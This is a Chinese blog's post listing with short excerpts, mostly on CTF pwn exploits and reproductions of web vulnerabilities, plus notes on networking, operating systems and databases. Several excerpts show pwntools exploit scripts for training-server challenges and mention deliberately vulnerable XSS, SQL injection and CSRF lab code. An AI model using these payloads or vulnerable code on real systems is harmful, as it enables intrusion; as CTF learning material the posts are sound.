- 博客(75)
- 收藏
- 关注
RSS订阅原创 攻防世界pwn高手进阶区 exp
dice_gamefrom pwn import *from ctypes import *lo = remote('220.249.52.133',45069)#lo = process('./dice_game')lib = cdll.LoadLibrary("libc.so.6")lib.srand(1) #定义种子的值为1#for i in range(50):# num = lib.rand()%6 + 1# print numpayload = 'a'*(0x50-0
2020-09-12 19:55:52
651
原创 pwn 程序保护
printf("%d", a) ,参数 a 在堆栈中的是 a 的地址,printf("%d",a)堆栈的结构结合此题的堆栈的数据顺序格式化字符串漏洞:正常情况下printf("%s", a) 是输出a的值,但是如果直接使用 printf(a),虽然也可以输出a的值,但如果a中含有%x等格式化字符时,变会出现泄漏内存的情况我们便在参数区输入 pwnme 的地址,利用%n 来更改其数值。 %n - 到目前为止所写的字符数构造如下的 payloadp32(pwnme_addr) +..
2020-09-12 16:43:51
586
原创 攻防世界pwn新手区 exp
level0from pwn import * r = remote("220.249.52.133", 57278)payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)r.recvuntil("Hello, World\n")r.sendline(payload)r.interactive()CGfsbfrom pwn import *xl = remote('220.249.52.133',43908)pwnname_addr
2020-09-11 21:31:01
540
原创 汇编基础之常用指令,寄存器
寄存器(32位): 通用寄存器(8个):EAX、EBX、ECX、EDX、ESI、EDI、EBP、ESP 其中 ECX 为计数寄存器 其中 ESP 为栈顶指针寄存器 其中 EBP 栈底指针寄存器 其中 ESI、EDI用于movs (把A复制到B) ESI 存放所复制数据的堆栈地址 A的地址 EDI 存放所复制数据的目的堆栈地址 B的地址 CPU下一次执行地址寄存器 EIP 堆栈:是程序所申请使用的内存空间,指令...
2020-09-04 22:24:58
641
原创 xxe漏洞
xxe漏洞,全称xml外部实体注入漏洞,xxe漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害XML 指可扩展标记语言(eXtensible Markup Language),是对html的补充XML 被设计用来传输和存储数据。DTD(文档类型定义)的作用是定义 XML 文档的合...
2020-04-19 16:33:18
246
原创 ssrf漏洞复现(附源码)
SSRF服务器请求伪造,是攻击者构造攻击链给服务器,服务器执行并发送请求造成安全问题的漏洞,一般用于在外网探测、攻击内网服务
2020-04-16 20:46:23
1297
原创 文件包含漏洞复现(附源码)
文件包含是指使用include、require等一些包含文件的函数,所产生的漏洞。分为本地文件包含、远程文件包含本地文件包含:是调用的是服务器本地的文件:如下:远程文件包含:是调用其他服务器的文件:如下:下面开始复现:<!DOCTYPE html><html><head> <title>index.php</ti...
2020-04-15 21:46:24
1346
原创 csrf漏洞复现(附源码)
csrf全称跨站请求伪造,攻击者盗用受害者用户的身份,以受害者的身份发送恶意请求下面进行复现,(本人前端、后端小白,代码有些不规范,大佬们见谅)这里我创建了三个文件login.php是用户的登入页面main.php是商品购买页面sqlcon.php存放操作数据库的各个函数。源码如下:以下代码不只存在csrf漏洞,还存在SQL盲注 有兴趣的可以注一下lo...
2020-04-14 23:11:24
1445
原创 DOM型xss复现(无过滤附源码)
<html> <head> <title> DOM-XSS</title> </head> <body> <script> function shuru(){ var oBox=document.get...
2020-04-12 21:58:13
1746
原创 存储型xss复现(无过滤附源码)
<html><head><script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie()</script></head><body><form action="cunchuxss....
2020-04-12 13:37:40
451
原创 反射型xss漏洞复现(无过滤,附源码)
<html><head><script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie()</script></head><body><form action="xss.php" m...
2020-04-11 20:58:44
857
原创 sql注入之万能密码漏洞复现(附源码)
<html><head><meta charset="utf-8"><title>sql注入靶机</title></head><body><form action="sql.php" method="GET">username:<input type="text" name="u...
2020-04-11 18:45:00
1923
原创 php连接并查询数据库
<html><head><meta charset="utf-8"><title>sql注入靶机</title></head><body><form action="sql.php" method="GET">username:<input type="text" name="u...
2020-04-11 15:16:04
966
转载 python3之requests
1、requsest的请求所有请求的功能可通过这7种方法访问,他们都返回response对象的一个实例。(1)requests.request(method,url,**kwargs):构造并发送一个request,返回一个response对象参数:method: request对象的方法(POST) url: request对象的URL params:可选的,要在查询字符串中...
2020-03-30 13:49:51
593
原创 sprintf函数字符串逃逸漏洞
在php的sprintf函数中 %后的一个字符(除了’%’)会被当作字符类型,像%s(代表字符串)、%b( 代表二进制数)单引号’,斜杠\也也会被当做字符类型。php源码中只对15种类型做了匹配,其他的字符php未做任何处理,直接跳过,所以导致了这个问题:没做字符类型检测的最大危害就是它可以吃掉一个转义符\, 如果%后面出现一个\,那么php会把\当作一个格式化字符的类型而吃掉\, ...
2020-03-25 22:58:26
432
原创 pyhon网络编程使用tcp发送/接收数据
tcp客户端发送/接收数据流程: 1、创建套接字 2、绑定本地端口(客户端也就可以不绑定,不绑定时系统随机开启一个端口) 3、连接服务器地址 4、发送或接收服务器数据 5、关闭套接字tcp发送数据实例:import socket# 定义服务器连接函数def tcpclient_to_sever(tcp_soctet): addr = input...
2019-12-25 16:55:56
411
原创 python网络编程 udp数据接收与发送
udp网络通信流程: 1、创建套接字 2、绑定端口(接收端必须绑定端口(否则每次通信都要向接收端询问端口号),发送端可不绑定端口;当不绑定端口时,操作系统将随机开启一个端口) 3、发送/接收数据 4、关闭套接字使用udp传输协议发送信息import socketdef main(): # 创建udp套接字...
2019-12-20 23:39:30
757
原创 虚拟内存储器
虚拟存储器管理: 实存管理需要将作业一次性全部装入内存,作业的大小收到内存的限制。解决方法有两种: 1、增加主存, 2、逻辑上扩充内存,即虚拟内存。 程序的局部性特性: 时间局部性:指程序中的某条指令一旦被执行,则在较短的时间内,该条指令可能被在执行 空间局部性:指一旦程序访问了某个存储单元,在较短的时间内,其附近的存...
2019-10-14 14:32:48
208
原创 内存储器
存储器主存管理的主要功能: 1、主存的分配和回收 2、地址转换和重定位 3、存储保护和主存共享 4、存储器扩充覆盖:由应用程序覆盖,在内存中将新的程序代码覆盖旧的程序代码 实现:使用函数库(操作系统不知覆盖),或操作系统支持交换:由OS控制,将暂时不用执行的程序放入外存中。虚拟存储的请求调入和预调入,内存的物理组织 1、物理地址:把内存...
2019-10-14 14:32:08
1457
原创 信号量PV
信号量:在多个相互合作的进程之间使用相同的信号来同步,一个进程强制的被停止在一个特定的地方直到收到一个专门的信号,这个信号就是信号量信号量S的初值表示可用资源数:当S>0时,S的值表示还剩可用的资源数;当S<=0时表示已无资源可以分配,其绝对值表示此时在队列中等待分配资源的进程数Wait操作表示申请资源(也就是P操作),Signal操作表示释放资源(也就是V操作),除了初始化外只...
2019-10-14 14:30:08
2051
原创 互斥和同步
互斥和同步: 临界资源:每次只允许一个进程访问的共享资源。 临界段:进程中访问临界资源(共享变量)的代码段;访问同一临界资源的各临界段分散在各有关进程的程序中。 临界段设置原则: 互斥性:每次允许一个进程停留在临界段 有限逗留:进程只能在临界段内逗留有限时间 有限等待:进程不能无限期等待在临界段之外 前进性:临...
2019-10-14 14:28:49
130
原创 作业调度分类、调度算法
作业的调度:分类: 高级调度:就是作业调度,按照某种调度算法从后备作业队列中挑选作业分配主存和外设资源。并建立进程 中级调度:又称中程调度,为了提高内存利用率和系统吞吐量,将暂时不能运行的进程不再占用宝贵的内存资源,将他们调至外存上去等待,也就是挂起 低级调度:又称进程调度,按照某种原则将将处理器分配给就绪进程或线程三级调度:指同时出现以上三种调度方式的调度模型。调度...
2019-10-14 14:25:50
1726
原创 进程、线程相关
进程:进程是动态的,程序是静态的;程序是由序代码的集合;进程是程序的执行。通常进程不可在计算机之间迁移,而程序可以相互复制传递 通过多次执行,一个程序可以对应多个进程;通过调用关系,一个进程可以包括多个程序 进程的性质: 并行性、制约性、动态性、结构性、共享性、独立性 进程是系统中资源分配和保护的基本单位。 进程的状态:运行状态、就绪状态、...
2019-10-14 14:18:12
122
原创 操作系统的体系结构、与程序调用过程
管态:是指操作系统管理程序运行的状态,具有较高的特权级别(又称为特权态)目态:用户程序运行时的状态,较低的特权级别,又称为普通态、用户态。高特权级别对应的可运行指令集包含低特权级别的管态权限:可以执行全部指令(包括特权指令)、可使用所有资源、具有改变处理器状态的权限目态权限:只有非特权指令能执行系统调用过程: 1、当编程人员给定系统调用名和参数之后,由一个类似于硬件中断处...
2019-10-14 14:16:07
355
原创 操作系统的分类
操作系统的分类 批处理(batch processing )就是将作业按照它们的性质分组(或分批),然后再成组(或成批)地提交给计算机系统,由计算机自动完成后再输出结果,从而减少作业建立和结束过程中的时间浪费。根据在内存中允许存放的作业数,批处理系统又分为单道批处理系统和多道批处理系统。在该系统中,用户所提交的作业都先存放在外存上并排成一个队列,成为“后备队列”;然后,由作业调度程序按一定...
2019-10-14 14:13:02
633
原创 eigrp tunnel 联合建网
一个红圆圈是一个mgre距离矢量型路由协议时关闭水平分割,(关自动下一跳(可选))no ip split-horizon eigrp 1no ip next-hop-self eigrp 1使用来下层分支通过公网直接通信ip nhrp shortcut启动nhrp的最短路径查找 (不再做隧道口映射,查目标公网口的映射)ip nhrp redirect 启动nhrp的...
2019-10-14 14:10:07
2520
原创 mpls 实验
R1与R3之间使用ospf,R2与R3之间使用eigrp, R5与R6之间使用ospf,R5与R7之间使用静态,R5与R8之间使用bgp建立ebgp邻居关系R1pingR6R2pingR7R8pingR1、R2R1的路由表R2的路由表R6的路由表R7的路由表R8的路由表R1:interface Loopback0 ip...
2019-10-14 14:09:46
1164
原创 ipsec nat-t 与 vrf 穿越实验
要求:R1做vrf穿 越,R5访问通过R1,R2做,并且R1,R2可以主动的访问R5vrf穿越写两条静态地址映射使 R1,R2可以主动的访问R5R5pingR1、R4R4pingR1、R5R1pingR5、R4R1p vrf k rd 1:1crypto keyring k vrf k pre-shared-key addre...
2019-10-14 14:08:25
595
原创 ipsec 基础实验
R1环回1.1.1.1 R3环回3.3.3.3 R2为公网R1与R2的环回通过ipsec vpn 通信效果R1crypto isakmp policy 10 encr 3des authentication pre-share group 5crypto isakmp key 6 ccie address 23.0.0.1 !!cr...
2019-10-14 14:08:02
609
原创 ospf tunnel 联合建网
R1,R7,R8为公网R10pingR6环回R10tracerouteR6环回R2:crypto isakmp policy 10 encr 3des hash md5 authentication pre-share group 2crypto isakmp key 6 ccie address 0.0.0.0 0.0.0.0crypto ipsec t...
2019-09-03 11:46:49
426
原创 ipsec 详解
目录加密算法对称加密算法非对称加密算法DH算法RSA 公钥+私钥 (成对出现)IPsecIPSec VPN简介ipsec的工作模式IPsec通信协议1、AH协议(Authentication Header,认证报头)2、ESP协议IPSec vpn建立IKEIpsec数据传递图对于ipsec vpn 最重要的是安全安全 三要素 安...
2019-09-01 14:22:59
32335
4
原创 bugku login1(SKCTF)
打开网页后根据题目中的提示,这道题的所使用的是sql约束攻击。以下原理引用于https://www.freebuf.com/articles/web/124537.html首先了解一下SQL约束攻击原理,sql语句中的空格作为字符的结尾时,空格符会被修剪,也就是说'vampire'与'vampire ' 没有什么区别SELECT * FROM users WHER...
2019-08-22 00:26:14
555
原创 并发控制、事务、锁机制
并发控制、事务 事务是用户定义的一个数据库操作序列,这些操作要么全做要么全不做。 程序和事务的区别 事务是恢复和并发控制的基本单位 一个应用程序通常有多个事务组成 定义事务的两种方式 显式方式:事务开始由用户显示控制或DBMS自动隐含,事务结束由用户显示控制 隐式方式:当用户没有显示的定义事务时,由DBMS自动划分事务 事务的ACI...
2019-08-11 14:56:52
315
原创 SQL用户权限语句操作
SQL用户权限语句操作 用户创建 第一种: CREATE USER case_dev identified BY 'pass123'; //密码默认为MD5加密,明文的密码不能使用 第二种: mysql> insert into User(Host,User,Password) -> value ('::1','xuanlin...
2019-08-10 13:29:34
8512
原创 数据库的安全
数据库安全数据库的安全性是指保护数据库,防止用户非法使用数据库造成数据泄密、更改或破坏。数据库安全性控制的常用方法:(由高到低排列)用户标识和鉴定存取控制、审计、视图密码存储1、用户标识和鉴定 用户标识自己的名字和方法有: ·用户名/口令:简单易行,容易被人窃取 ·每个用户事先约定一个计算过程或函数;系统提供一个随机数,用户根据事先的函数计算得出结果,系统根...
2019-08-10 11:20:42
1310
原创 SQL视图基本操作
视图视图是从一个表或几个基本表导出的表,是一个虚表,不存在数据冗余基于视图的操作定义视图(DDL)建立、定义该视图的新视图、删除、查询(DML)、受限更新(DML)作用:视图能够简化用户操作 视图使用户能以多种角度看待同一数据 视图对重构数据库提供了一定的逻辑独立性 视图能够对机密数据提供安全保护:对不同的用户定义不同的视图,是每个用户只能看到他有权限看到...
2019-08-09 15:08:15
999
原创 sql语言的各种增删改查操作
sql语言数据定义语言(DDL),数据操作语言(DML),数据控制语言(DCL)和事务控制语言(TCL)。数据定义语言是对表进行操作:create、drop、alter数据操作语言是对数据进行操作:insert、update、delete数据控制语言是对用户权限进行操作:grant,revoke数据查询功能:select primary key 主键约束(主码约束) un...
2019-08-08 21:48:11
766
原创 索引
索引:索引是为了加速对表中数据的读取速度而创建的一种分散的存储结构,是针对表建立的如果没有创建索引 在数百万的数据中查询一条数据,可能需要几分钟,有索引可能就零点几秒。索引包括普通索引、唯一索引、主键索引、聚集索引在创建PRIMARY KEY 约束时,如果不存在该表的聚集索引且未指定唯一非聚集索引,则将自动对一列或多列创建唯一聚集索引。 主键列不允许空值。在创建 UNIQUE ...
2019-08-08 15:08:49
124
原创 数据库相关概念(全)
数据库系统是由数据库、数据库管理系统(及其开发工具)、应用系统、数据库管理员和用户构成。数据(data):描述事物的符号记录数据库(database简称DB):是长期存储在计算机内、有组织、可共享的数据的集合。数据库管理系统(DBMS):是位于用户与操作系统之间的一层数据管理软件。数据库系统(DBS):是指计算机系统中引入数据库后的系统构成。各种数据库的操作命令都是由数据库管理系统(...
2019-08-07 16:56:15
578
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人